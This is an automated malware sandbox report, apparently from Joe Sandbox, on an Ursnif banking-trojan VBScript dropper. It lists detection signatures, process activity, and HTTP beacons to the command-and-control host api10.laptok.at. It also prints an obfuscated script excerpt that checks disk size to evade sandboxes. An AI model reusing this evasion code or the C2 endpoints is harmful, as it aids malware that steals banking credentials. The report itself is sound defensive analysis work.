Loading ...

Play interactive tourEdit tour

Analysis Report 6L4MCnj8FDjS.vbs

Overview

General Information

Sample Name:6L4MCnj8FDjS.vbs
Analysis ID:287399
MD5:7f3ef738c67a95601faf316dd0a44c34
SHA1:dbe278e8e243215d3409504dcb25edee29ab7b03
SHA256:89c1b7218c1437d3b79c0a5041b5a322f7f99d799a79f831b05be079514b30a0

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6772 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6L4MCnj8FDjS.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6352 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6936 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6352 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 7140 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2916 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7140 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5356 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4432 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5356 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4588 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5384 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 3 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://api10.laptok.at/api1/ptmcxb3UNW/g9lJ5wevXjllGWuwb/rk9rKu2BDvxT/QRJsTzsyjOL/PIvsE7yj9Plv3n/FaIAvira URL Cloud: Label: malware
            Source: http://api10.laptok.at/api1/ptmcxb3UNW/g9lJ5wevXjllGWuwb/rk9rKu2BDvxT/QRJsTzsyjOL/PIvsE7yj9Plv3n/FaIyslM2_2Buzc1k6G7VY/ipGWNgJ1iOzkI9jJ/W9bFQWX8mJlKvKU/YPVPrUi1v_2BSPmekN/DPravyq53/zGB48NmfTYdqwhlvVDum/WyaqhtLwUF6nHDhqqaV/gwV7eJKcyGueohzD2TrOre/AmHBe6morm7XC/cwN8rZWL/BAMdIAgSb5ZWH2X2l5K3Y_2/Fy_2FaAEXW/uN_0A_0D2Cm0ZfqY1/edgrHFWkJp9A/VZxQEuO1c0t/A4yxgPby/8AF3VLlAvira URL Cloud: Label: malware
            Source: http://api10.laptok.at/api1/MG6aqmFRx71/93c58hLBINiG7d/HI8zaJg0bUJdh1CixsKNO/KGbPV1_2B2_2FE6E/8a9FPAXGfuZ8f_2/Fc6DDQ0RAJXa4AXyvl/0V9_2FTxD/LBZv8hi5gnZ7xJjS6O02/qdV7te7yaNZoP1tJE1p/_2Be_2BZ_2BOXsyj_2Fgs_/2BoBTmzGfFew_/2Bw_2FwV/u353AqSocJoRCPZ81JYbTSX/2W96c_2FMp/rXN9sT1sQwm_2FV2g/QdSnadTXcQIN/FkeK_2FwYQK/7ENRLQm0jwKc5O/xsyDbUv_0A_0DHmE82WxU/ZWyoJ6TmwmIzZaqf/Bo7lN13WMWCZb2b/_2FhS67Ya9GTsyYBVB/UKvQpyzs4/mSrtAvira URL Cloud: Label: malware
            Source: http://api10.laptok.at/api1/nh8Oe0a4_2Fm/udf0m049OeJ/nMu_2Bmd80au_2/FSjNYWFRrZ9_2Fi2RU9WT/6cTyMwnigOBQTnrJ/9Wj00KrBGb5aqns/Xk7kQDf6GG_2FmBWmq/P3WYwAOgj/PUoZKORvMVOVlj1SyeB_/2FwkpVFNSPzaxULycOr/re9pOZK1lrj0y_2FoOKEs2/9t6nr44SQ25ZY/580PzOev/t2b905CWWJcgFADquTHiEEf/pLELIfg9Tl/ACVucyQ1yNcu3Lvxx/GmA9DD1PyhMD/56ailR_0A_0/Do70pdrqjVKKvQ/t4PdKvT2MASn4v8Gaicve/fInINUnSWWIyt_2F/g4053j_2FsI/GNjlpcc8/S6zAvira URL Cloud: Label: malware
            Source: http://api10.laptok.at/api1/MG6aqmFRx71/93c58hLBINiG7d/HI8zaJg0bUJdh1CixsKNO/KGbPV1_2B2_2FE6E/8a9FPAAvira URL Cloud: Label: malware
            Source: http://api10.laptok.at/api1/YT58E2mcXcA6GCIkb_2FOUx/aNeXw_2Bao/1I8U_2BE2NUyEQDYE/iR_2FWMCGQQD/J253PVAvira URL Cloud: Label: malware
            Source: http://api10.laptok.at/api1/nh8Oe0a4_2Fm/udf0m049OeJ/nMu_2Bmd80au_2/FSjNYWFRrZ9_2Fi2RU9WT/6cTyMwnigOAvira URL Cloud: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\paymaster.cppAvira: detection malicious, Label: TR/AD.UrsnifDropper.fsmec
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: Joe Sandbox ViewIP Address: 8.208.101.13 8.208.101.13
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/YT58E2mcXcA6GCIkb_2FOUx/aNeXw_2Bao/1I8U_2BE2NUyEQDYE/iR_2FWMCGQQD/J253PVFpUZu/GnE4iSmDYSPRq_/2Ft8AT0ctTTBVw5oDC0f5/IwAakeBFEUQYGL7u/5orHs1NDoFNIEd7/hcd1srK7DDQNg575B5/_2F9TN9Gk/BxlSJeLIAvwu3S6bGnHO/7ypcNgGti9smR_2FoOY/drkATeGh_2FwBhjOkuD6ZS/p_2Fmf4mb_2Fq/TmrZF7lS/CkN6rgnXPXIemBtjrV9phKs/0_0A_0D3Gd/_2F7iMH5jluApUpBX/9aNILu2X3Jng/ruTDGgU_2F6HT2Dj/sGT HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/nh8Oe0a4_2Fm/udf0m049OeJ/nMu_2Bmd80au_2/FSjNYWFRrZ9_2Fi2RU9WT/6cTyMwnigOBQTnrJ/9Wj00KrBGb5aqns/Xk7kQDf6GG_2FmBWmq/P3WYwAOgj/PUoZKORvMVOVlj1SyeB_/2FwkpVFNSPzaxULycOr/re9pOZK1lrj0y_2FoOKEs2/9t6nr44SQ25ZY/580PzOev/t2b905CWWJcgFADquTHiEEf/pLELIfg9Tl/ACVucyQ1yNcu3Lvxx/GmA9DD1PyhMD/56ailR_0A_0/Do70pdrqjVKKvQ/t4PdKvT2MASn4v8Gaicve/fInINUnSWWIyt_2F/g4053j_2FsI/GNjlpcc8/S6z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/ptmcxb3UNW/g9lJ5wevXjllGWuwb/rk9rKu2BDvxT/QRJsTzsyjOL/PIvsE7yj9Plv3n/FaIyslM2_2Buzc1k6G7VY/ipGWNgJ1iOzkI9jJ/W9bFQWX8mJlKvKU/YPVPrUi1v_2BSPmekN/DPravyq53/zGB48NmfTYdqwhlvVDum/WyaqhtLwUF6nHDhqqaV/gwV7eJKcyGueohzD2TrOre/AmHBe6morm7XC/cwN8rZWL/BAMdIAgSb5ZWH2X2l5K3Y_2/Fy_2FaAEXW/uN_0A_0D2Cm0ZfqY1/edgrHFWkJp9A/VZxQEuO1c0t/A4yxgPby/8AF3VLl HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/MG6aqmFRx71/93c58hLBINiG7d/HI8zaJg0bUJdh1CixsKNO/KGbPV1_2B2_2FE6E/8a9FPAXGfuZ8f_2/Fc6DDQ0RAJXa4AXyvl/0V9_2FTxD/LBZv8hi5gnZ7xJjS6O02/qdV7te7yaNZoP1tJE1p/_2Be_2BZ_2BOXsyj_2Fgs_/2BoBTmzGfFew_/2Bw_2FwV/u353AqSocJoRCPZ81JYbTSX/2W96c_2FMp/rXN9sT1sQwm_2FV2g/QdSnadTXcQIN/FkeK_2FwYQK/7ENRLQm0jwKc5O/xsyDbUv_0A_0DHmE82WxU/ZWyoJ6TmwmIzZaqf/Bo7lN13WMWCZb2b/_2FhS67Ya9GTsyYBVB/UKvQpyzs4/mSrt HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: msapplication.xml1.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x94456d10,0x01d68e06</date><accdate>0x94456d10,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x94456d10,0x01d68e06</date><accdate>0x94456d10,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x944c93c1,0x01d68e06</date><accdate>0x944c93c1,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x944c93c1,0x01d68e06</date><accdate>0x944c93c1,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x944ef6c9,0x01d68e06</date><accdate>0x944ef6c9,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x944ef6c9,0x01d68e06</date><accdate>0x944ef6c9,0x01d68e06</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 18 Sep 2020 12:56:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {F4AE4B93-F9F9-11EA-90E8-ECF4BBEA1588}.dat.30.dr, ~DF691B3118D98C0EDE.TMP.30.drString found in binary or memory: http://api10.laptok.at/api1/MG6aqmFRx71/93c58hLBINiG7d/HI8zaJg0bUJdh1CixsKNO/KGbPV1_2B2_2FE6E/8a9FPA
            Source: {BE54E3EE-F9F9-11EA-90E8-ECF4BBEA1588}.dat.20.drString found in binary or memory: http://api10.laptok.at/api1/YT58E2mcXcA6GCIkb_2FOUx/aNeXw_2Bao/1I8U_2BE2NUyEQDYE/iR_2FWMCGQQD/J253PV
            Source: {D8B744D5-F9F9-11EA-90E8-ECF4BBEA1588}.dat.24.drString found in binary or memory: http://api10.laptok.at/api1/nh8Oe0a4_2Fm/udf0m049OeJ/nMu_2Bmd80au_2/FSjNYWFRrZ9_2Fi2RU9WT/6cTyMwnigO
            Source: {E68701EF-F9F9-11EA-90E8-ECF4BBEA1588}.dat.27.drString found in binary or memory: http://api10.laptok.at/api1/ptmcxb3UNW/g9lJ5wevXjllGWuwb/rk9rKu2BDvxT/QRJsTzsyjOL/PIvsE7yj9Plv3n/FaI
            Source: msapplication.xml.20.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.20.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.20.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.20.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.20.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.20.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.20.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.20.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\paymaster.cpp 171E91073EF3BC55FDC90780A351918FA99E04BE5043DBD4AE1ED220C6631F8C
            Source: 6L4MCnj8FDjS.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.evad.winVBS@13/70@4/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6L4MCnj8FDjS.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6L4MCnj8FDjS.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6352 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7140 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5356 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6352 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7140 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5356 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\LyncJump to behavior
            Source: 6L4MCnj8FDjS.vbsStatic file information: File size 1155568 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\69\Shell\85\32\And\half\57\22\80\Neck\62\15\connect.pdb source: wscript.exe, 00000002.00000003.214035260.0000029CC1ABC000.00000004.00000001.sdmp, paymaster.cpp.2.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(351851199)) > 0 And aggregate963 = 0) ThenREM Griswold peon radian episcopal intermittent kindle circumsphere lineman blazon tarpaper laud inshore nominee servant galvanism footprint bam treetop huff sealant. 4005885 regretful dowel810 emerge Brownian sell vitreous grottoes slit plasma Malcolm circumcision amalgamate decontrolling. torture. sandpiper chairwoman283 oscillate Rwanda, 4724005 showcase Whelan Elsevier489 arborescent booth explode despise typewritten86 Harriman agnomen toothpick573 dormitory Exit FunctionEnd IfREM wand toddy Oldsmobile chromatography Smucker anomie ruinous116. 9686269 franchise. Uganda Pygmalion Ackley Maharashtra oath kelly banter, denudation Miles Gerry delightful game quaternary Jon469 gig plywood Dudley retaliate perversion Aesop Maier753 tuberculin Clayton Fortescue135, Essex hinterland Nairobi Mafia dragging pendulum850 drugstore institution279 Trichinella chlorate poetry53 Sidney Lakehurst shabby. commissary backlog cosmology UN idiotic inaccuracy Lucia334 compliant. theology morn, confirmation abbey Odin pushover ovulate convolution instrument Loire relish Saunders Set nation = GetObject("winmgmts:\\.\root\cimv2")Set kzpmSExK = nation.ExecQuery("Select * from Win32_LogicalDisk")For Each wXgOzgz In kzpmSExKNicosia = Nicosia + Int(wXgOzgz.Size / ((68 + (69 + (1073741819 - 119.0))) - 13.0))' Brahmsian furnish64, Evanston760 adject Aztec389 trite obstruct Cyclades split stowage Brumidi Spencerian songful firmware meson walk pursue576 period ontogeny footman leaky intimidate declination appeasable mania bloom sprung stub bauble aghast barrow, childbirth Oregon Bolivia madam appraise, Daniel NASA Orwellian web introspect recalcitrant, highball516 than846 candy shadow Capetown lumpish aggressive816 Chester inoperative em influent nucleotide613 sallow piddle vendible Viet programmer virtuosity radiography852 irredentism skyline Shakespearean deer, 5502771 chance Sanchez629 dominant freehold Neumann vest dignitary route era bookend elastic influential boatyard posable nought typhoid423 detector. inverse322 manioc leonine squander flexible Cummings Avis gravitometer keelson territorial NextREM secondhand analgesic laughingstock973 Fitchburg incidental aurora dietician haiku Dylan hieroglyphic Midwestern, twirly odometer taxpaying protease western perturb lawman708 Arden canny stilt exploitation ls confrontation imprint bacteria monsoon Lomb unruly infrequent Midas323 run wharf myth stumble amoral inhale aphid everyman If Nicosia < (1453 - ((2122 - (84 + 643.0)) - 2.0)) ThenSZMYfEnd IfREM jolly, rustle apprehension shad peninsular radiology Noel flake Adlerian bye Peterson. auk debarring sac Nietzsche Hubert morgen yell. militarism, thunderstorm priggish testify dubious, xylene invaluable weaken turtleback three childish Australia bezel daze26 Antilles762 bacterial Erlenmeyer End FunctionFunction NbIrDNan()on error resume nextREM bitwise acceptor Camino. launch cornfield phone275. medicinal,
            Source: initial sampleStatic PE information: section name: .text entropy: 6.8218736082

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\paymaster.cppJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\paymaster.cppJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000005.00000003.370902405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371020058.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371053221.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370851748.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.371038098.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370930001.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370994998.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.370957022.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\6l4mcnj8fdjs.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000002.00000003.236104063.0000029CC1A67000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000002.00000003.220977832.0000029CC1A70000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
